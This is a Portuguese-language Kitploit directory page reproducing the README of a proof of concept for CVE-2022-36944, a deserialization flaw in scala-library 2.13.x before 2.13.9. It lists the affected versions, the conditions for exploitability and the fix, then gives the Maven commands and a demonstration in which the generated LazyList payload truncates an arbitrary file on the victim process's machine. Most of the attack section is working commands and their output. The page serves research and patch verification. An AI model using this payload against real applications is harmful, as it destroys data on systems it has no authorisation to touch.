Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
lazylist-cve-poc — POC para a exploração da vulnerabilidade CVE-2022-36944 | Kitploit
Ferramentas/GitHubGitHub/yarocher/lazylist-cve-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoExploração de Binários
GitHubyarocher/lazylist-cve-poc

lazylist-cve-poc

POC para a exploração da vulnerabilidade CVE-2022-36944

Ver Repositório
11113há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gerador de payload CVE-2022-36944

Este mini-projeto foi criado para demonstrar a prova de conceito da vulnerabilidade CVE-2022-36944. É semelhante ao ysoserial, mas gera payload apenas para este CVE com a classe LazyList.

FAQ Rápida

Quais artefatos trazem a vulnerabilidade?

org.scala-lang:scala-library com versões 2.13.x anteriores a 2.13.9

Quais aplicações são vulneráveis?

Duas condições devem ser combinadas para tornar sua aplicação explorável:

  • Sua aplicação contém o jar scala-library vulnerável no classpath
  • ObjectInputStream#readObject() é eventualmente chamado em algum lugar da sua aplicação e dados não confiáveis (controlados pelo atacante) são passados para ele

Onde a vulnerabilidade foi corrigida?

Veja o PR do scala: #10118

Compilação

root@kitploit:~
mvn clean package

Executar

O seguinte comando exibirá o payload na saída padrão (stdout), que pode ser usado para truncar arquivos arbitrários na máquina da vítima:

root@kitploit:~
mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="/file/to/truncate false"

Demonstração

A) Através de um arquivo

  1. Prepare um arquivo de teste com alguns dados dentro:
root@kitploit:~
$ yes sometestdata > test_data
^C
$ head test_data 
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
  1. Gere o payload e salve no arquivo payload.ser:
root@kitploit:~
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" > payload.ser
  1. Execute o processo vítima (ClassCastException é esperada):
root@kitploit:~
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="payload.ser"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
  1. Verifique se o arquivo vítima foi truncado:
root@kitploit:~
$ head test_data 
$ 

B) Pipe para stdin

Os passos 2-3 podem ser combinados desta forma (use "-" como arquivo para Victim):

root@kitploit:~
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" | mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="-"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
Baixar ferramenta